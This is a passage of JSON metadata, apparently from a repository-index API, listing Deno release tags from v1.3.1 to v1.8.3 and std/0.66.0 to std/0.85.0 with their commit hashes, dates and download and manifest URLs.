/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html